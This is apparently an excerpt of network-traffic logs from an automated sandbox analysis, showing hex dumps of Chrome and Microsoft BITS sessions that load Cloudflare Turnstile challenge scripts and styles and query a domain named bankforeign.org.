                                                            2024-02-01 20:38:11 UTC1369INData Raw: 74 69 6f 6e 20 51 65 28 65 2c 72 29 7b 65 2e 77 61 74 63 68 43 61 74 49 6e 74 65 72 76 61 6c 3d 3d 3d 6e 75 6c 6c 26 26 28 65 2e 77 61 74 63 68 43 61 74 49 6e 74 65 72 76 61 6c 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 28 65 2c 72 29 7d 2c 5a 74 29 29 7d 66 75 6e 63 74 69 6f 6e 20 24 65 28 65 29 7b 76 61 72 20 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 21 3d 3d 76 6f 69 64 20 30 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 21 31 3b 65 2e 77 61 74 63 68 43 61 74 49 6e 74 65 72 76 61 6c 21 3d 3d 6e 75 6c 6c 26 26 28 65 2e 77 69 64 67 65 74 4d 61 70 2e 73 69 7a 65 3d 3d 3d 30 7c 7c 72 29 26 26 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 65 2e 77 61 74 63 68 43 61 74 49
                                                            Data Ascii: tion Qe(e,r){e.watchCatInterval===null&&(e.watchCatInterval=setInterval(function(){tr(e,r)},Zt))}function $e(e){var r=arguments.length>1&&arguments[1]!==void 0?arguments[1]:!1;e.watchCatInterval!==null&&(e.widgetMap.size===0||r)&&clearInterval(e.watchCatI
                                                            2024-02-01 20:38:11 UTC1369INData Raw: 65 6e 74 4e 6f 64 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 74 3d 3d 3d 76 6f 69 64 20 30 7c 7c 74 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 28 6d 2c 6f 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 44 74 28 65 2c 72 29 7b 76 61 72 20 74 3d 65 2e 5f 70 53 74 61 74 65 3b 72 65 74 75 72 6e 20 74 3f 28 72 2e 69 73 52 65 61 64 79 3d 74 2e 69 73 52 65 61 64 79 2c 72 2e 69 73 52 65 63 61 70 74 63 68 61 43 6f 6d 70 61 74 69 62 69 6c 69 74 79 4d 6f 64 65 3d 74 2e 69 73 52 65 63 61 70 74 63 68 61 43 6f 6d 70 61 74 69 62 69 6c 69 74 79 4d 6f 64 65 2c 72 2e 6c 61 73 74 57 69 64 67 65 74 49 64 78 3d 74 2e 6c 61 73 74 57 69 64 67 65 74 49 64 78 2c 72 2e 73 63 72 69 70 74 57 61 73 4c 6f 61 64 65 64 41 73 79 6e 63 3d 74 2e 73 63 72 69 70 74 57 61 73 4c 6f 61 64 65 64 41 73 79 6e 63 2c 72 2e
                                                            Data Ascii: entNode)===null||t===void 0||t.replaceChild(m,o)}}function Dt(e,r){var t=e._pState;return t?(r.isReady=t.isReady,r.isRecaptchaCompatibilityMode=t.isRecaptchaCompatibilityMode,r.lastWidgetIdx=t.lastWidgetIdx,r.scriptWasLoadedAsync=t.scriptWasLoadedAsync,r.
                                                            2024-02-01 20:38:11 UTC1369INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 69 66 28 74 79 70 65 6f 66 20 65 21 3d 22 73 74 72 69 6e 67 22 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 64 6a 62 32 3a 20 65 78 70 65 63 74 65 64 20 73 74 72 69 6e 67 2c 20 67 6f 74 20 22 2e 63 6f 6e 63 61 74 28 74 79 70 65 6f 66 20 65 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 6b 28 65 29 29 29 3b 66 6f 72 28 76 61 72 20 72 3d 35 33 38 31 2c 74 3d 30 3b 74 3c 65 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 6f 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 74 29 3b 72 3d 72 2a 33 33 5e 6f 7d 72 65 74 75 72 6e 20 72 3e 3e 3e 30 7d 76 61 72 20 61 65 3d 21 31 2c 79 3d 7b 74 75 72 6e 73 74 69 6c 65 4c 6f 61 64 49 6e 69 74 54 69 6d 65 3a 2b 6e 65 77 20 44 61 74 65
                                                            Data Ascii: }function Wt(e){if(typeof e!="string")throw new Error("djb2: expected string, got ".concat(typeof e=="undefined"?"undefined":k(e)));for(var r=5381,t=0;t<e.length;t++){var o=e.charCodeAt(t);r=r*33^o}return r>>>0}var ae=!1,y={turnstileLoadInitTime:+new Date


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.44974723.36.68.63443
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:11 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Accept: */*
                                                            Accept-Encoding: identity
                                                            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                            Range: bytes=0-2147483646
                                                            User-Agent: Microsoft BITS/7.8
                                                            Host: fs.microsoft.com
                                                            2024-02-01 20:38:12 UTC538INHTTP/1.1 200 OK
                                                            Content-Type: application/octet-stream
                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                            ApiVersion: Distribute 1.1
                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                            X-Azure-Ref: 0sVnPYwAAAADGzEIVjwdQRqjbE+0BwJHyTU5aMjIxMDYwNjE0MDA5AGNlZmMyNTgzLWE5YjItNDRhNy05NzU1LWI3NmQxN2UwNWY3Zg==
                                                            Cache-Control: public, max-age=95234
                                                            Date: Thu, 01 Feb 2024 20:38:12 GMT
                                                            Content-Length: 55
                                                            Connection: close
                                                            X-CID: 2
                                                            2024-02-01 20:38:12 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.449748104.21.73.884433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:12 UTC473OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/461457:1706818037:TP9mi9T_s6X4VHjzA43SctCQXweCPTtEqjXfreTTO6Q/84ecff1778c36766/f5b0b7c7d91ebf9 HTTP/1.1
                                                            Host: bankforeign.org
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:38:12 UTC715INHTTP/1.1 400 Bad Request
                                                            Date: Thu, 01 Feb 2024 20:38:12 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            cf-chl-out: 3dfK2gWYe0U2gZK21sZneQ==$cW5nr9yHvDbE6H32+iFzUQ==
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IVJdVOb7WxWvo6SLG%2BEwMZo6OU%2FyHiLNCb%2Fk6eV%2F6IBjtBr5aUlrh39osNgDuWgQxvNDtYJ6iQsMtgUemDOrdkWeJ6HM%2F1GWJAMR36zsvUu40niVpkKGRIjCgdAhVmpiSnY%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 84ecff280b6db0ee-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:12 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                            Data Ascii: 7invalid
                                                            2024-02-01 20:38:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.449749104.17.3.1844433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:12 UTC754OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xprvk/0x4AAAAAAADnPIDROrmt1Wwj/light/normal HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            sec-ch-ua-platform: "Windows"
                                                            Upgrade-Insecure-Requests: 1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: navigate
                                                            Sec-Fetch-Dest: iframe
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:38:12 UTC1187INHTTP/1.1 200 OK
                                                            Date: Thu, 01 Feb 2024 20:38:12 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                            cross-origin-embedder-policy: require-corp
                                                            cross-origin-opener-policy: same-origin
                                                            cross-origin-resource-policy: cross-origin
                                                            document-policy: js-profiling
                                                            origin-agent-cluster: ?1
                                                            permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                            referrer-policy: same-origin
                                                            Server: cloudflare
                                                            CF-RAY: 84ecff284c9c7bd8-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:12 UTC182INData Raw: 37 62 30 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e
                                                            Data Ascii: 7b0c<!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta n
                                                            2024-02-01 20:38:12 UTC1369INData Raw: 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 68 2f 62 2f 63 6d 67 2f 31 2f 77 68 30 45 30 53 58 59 6e 78 36 70 54 42 64 4a 57 25 32 46 6c 39 32 36 49 25 32 42 50 52 55 70 6c 52 64 74 51 7a 33 4b 39 6c 48 58 73 25 32 46 73 25 33 44 22 20 61 73 3d 22 69 6d 61 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 68 65 63 6b 69 6e 67 20 79 6f 75 72 20 42 72 6f 77 73 65 72 26 68 65 6c 6c 69 70 3b 3c 2f
                                                            Data Ascii: ame="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <link rel="preload" href="/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D" as="image"> <title>Checking your Browser&hellip;</
                                                            2024-02-01 20:38:12 UTC1369INData Raw: 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 72 6f 62 6f 74 6f 2c 20 6f 78 79 67 65 6e 2c 20 75 62 75 6e 74 75 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 31 36 70 78 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 32 35 3b 0a 20 20 63 6f 6c 6f 72 3a 20
                                                            Data Ascii: nt, "Segoe UI", roboto, oxygen, ubuntu, "Helvetica Neue", arial, sans-serif; font-size: 14px; font-weight: 400; -webkit-font-smoothing: antialiased; font-style: normal;}h1 { margin: 16px 0; text-align: center; line-height: 1.25; color:
                                                            2024-02-01 20:38:12 UTC1369INData Raw: 74 68 3a 20 36 70 78 3b 0a 20 20 73 74 72 6f 6b 65 3a 20 23 66 38 66 38 66 38 3b 0a 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 20 31 30 3b 0a 7d 0a 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 2e 70 31 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 32 34 32 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 32 34 32 3b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 33 38 31 32 37 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 74 72 6f 6b 65 20 30 2e 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 36 35 2c 20 30 2c 20 30 2e 34 35 2c 20 31 29 20 66 6f 72 77 61 72 64 73 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 30 2e 35 73 3b 0a 7d 0a 0a
                                                            Data Ascii: th: 6px; stroke: #f8f8f8; stroke-miterlimit: 10;}#success-icon .p1 { stroke-dasharray: 242; stroke-dashoffset: 242; box-shadow: inset 0 0 0 #038127; animation: stroke 0.4s cubic-bezier(0.65, 0, 0.45, 1) forwards; animation-delay: 0.5s;}
                                                            2024-02-01 20:38:12 UTC1369INData Raw: 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 2e 6d 61 72 6b 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 61 63 74 69 76 65 20 7e 20 2e 6d 61 72 6b 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 66 62 61 64 34 31 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 6d 61 72 6b 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 36 64 36 64 36 64 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 74 70 2d 63 68 65 63 6b 62
                                                            Data Ascii: 22;}.theme-dark .ctp-checkbox-label input:focus ~ .mark, .theme-dark .ctp-checkbox-label input:active ~ .mark { border: 2px solid #fbad41;}.theme-dark .ctp-checkbox-label input:checked ~ .mark { background-color: #6d6d6d;}.theme-dark .ctp-checkb
                                                            2024-02-01 20:38:12 UTC1369INData Raw: 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d
                                                            Data Ascii: per-loop-link { color: #bbb;}.theme-dark #fr-helper-link:visited, .theme-dark #fr-helper-link:link,.theme-dark #fr-helper-loop-link:visited,.theme-dark #fr-helper-loop-link:link { color: #bbb;}.theme-dark #fr-helper-link:active, .theme-dark #fr-
                                                            2024-02-01 20:38:12 UTC1369INData Raw: 20 61 3a 66 6f 63 75 73 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 36 36 33 37 39 3b 0a 7d 0a 0a 23 6c 6f 67 6f 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 32 36 70 78 3b 0a 7d 0a 0a 2e 66 61 69 6c 75 72 65 2d 63 69 72 63 6c 65 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 31 36 36 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 31 36 36 3b 0a 20 20 73 74 72 6f 6b 65 2d 77 69
                                                            Data Ascii: a:focus,#challenge-error-text a:active,#challenge-error-text a:hover,#challenge-error-text a:focus { color: #166379;}#logo { margin-bottom: 1px; height: 26px;}.failure-circle { stroke-dasharray: 166; stroke-dashoffset: 166; stroke-wi
                                                            2024-02-01 20:38:12 UTC1369INData Raw: 0a 7d 0a 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 6d 61 72 6b 3a 3a 61 66 74 65 72 20 7b 0a 20 20 74 6f 70 3a 20 33 70 78 3b 0a 20 20 6c 65 66 74 3a 20 38 70 78 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 34 35 64 65 67 29 20 73 63 61 6c 65 28 31 29 3b 0a 20 20 62 6f 72 64 65 72 3a 20 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 0a 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 30 20 34 70 78 20 34 70 78 20 30 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 36 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 32 70 78 3b 0a 7d 0a 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 2e 6d 61 72 6b 20 7b 0a 20 20 70 6f 73
                                                            Data Ascii: }.ctp-checkbox-label input:checked ~ .mark::after { top: 3px; left: 8px; transform: rotate(45deg) scale(1); border: solid #c44d0e; border-width: 0 4px 4px 0; border-radius: 0; width: 6px; height: 12px;}.ctp-checkbox-label .mark { pos
                                                            2024-02-01 20:38:12 UTC1369INData Raw: 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 65 72 6d 73 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 71 72 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 70 78 3b 0a 20 20 77 69 64 74 68 3a 20 61 75 74 6f 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 66 61 69 6c 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 66 6c 65 78 2d 66 6c 6f 77 3a 20 72 6f 77
                                                            Data Ascii: g-right: 0; text-align: right;}.size-compact #terms { text-align: right;}.size-compact #qr { text-align: center;}.size-compact #challenge-error-title { margin-top: 3px; width: auto;}.size-compact #fail { display: flex; flex-flow: row
                                                            2024-02-01 20:38:12 UTC1369INData Raw: 73 73 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 38 36 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 66 61 69 6c 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 38 36 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 73 70 69 6e 6e 65 72 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 38 36 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 65 78 70 69 72 65 64 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 38 36 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 65 78 70 69 72 65 64 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 7d 0a 2e 72 74 6c 20 2e 63 74 70 2d 63 68
                                                            Data Ascii: ss-icon { left: 86px;}.rtl .size-compact #fail-icon { left: 86px;}.rtl .size-compact #spinner-icon { left: 86px;}.rtl .size-compact #expired-icon { left: 86px;}.rtl .size-compact #expired { margin-top: 0; margin-left: 0;}.rtl .ctp-ch


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.449750104.17.3.1844433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:13 UTC711OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=84ecff284c9c7bd8 HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xprvk/0x4AAAAAAADnPIDROrmt1Wwj/light/normal
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:38:13 UTC335INHTTP/1.1 200 OK
                                                            Date: Thu, 01 Feb 2024 20:38:13 GMT
                                                            Content-Type: application/javascript; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Server: cloudflare
                                                            CF-RAY: 84ecff2c9f964519-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:13 UTC1034INData Raw: 37 65 36 30 0d 0a 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 7e 66 75 6e 63 74 69 6f 6e 28 69 67 2c 66 78 2c 66 79 2c 66 42 2c 66 44 2c 66 45 2c 66 46 2c 66 47 2c 66 48 2c 66 49 2c 66 4a 2c 66 4b 2c 66 4c 2c 66 4d 2c 66 4e 2c 66 4f 2c 66 50 2c 66 51 2c 66 52 2c 66 53 2c 66 54 2c 66 55 2c 66 56 2c 66 57 2c 66 58 2c 66 59 2c 66 5a 2c 67 30 2c 67 31 2c 67 32 2c 67 33 2c 67 34 2c 67 35 2c 67 36 2c 67 37 2c 67 38 2c 67 39 2c 67 61 2c 67 62 2c 67 63 2c 67 64 2c 67 65 2c 67 66 2c 67 67 2c 67 68 2c 67 69 2c 67 6a 2c 67 6b 2c 67 6c 2c 67 6d 2c 67 6e 2c 67 6f 2c 67 70 2c 67 71 2c 67 72 2c 67 73 2c 67 75 2c 67 49 2c 67 56 2c 68 30 2c 68 31 2c 68 64 2c 68 6d 2c 68 71 2c 68 72 2c 68 76 2c 68 77 2c 69 30 2c 69 34 2c 69 35 2c
                                                            Data Ascii: 7e60window._cf_chl_opt.uaO=false;~function(ig,fx,fy,fB,fD,fE,fF,fG,fH,fI,fJ,fK,fL,fM,fN,fO,fP,fQ,fR,fS,fT,fU,fV,fW,fX,fY,fZ,g0,g1,g2,g3,g4,g5,g6,g7,g8,g9,ga,gb,gc,gd,ge,gf,gg,gh,gi,gj,gk,gl,gm,gn,go,gp,gq,gr,gs,gu,gI,gV,h0,h1,hd,hm,hq,hr,hv,hw,i0,i4,i5,
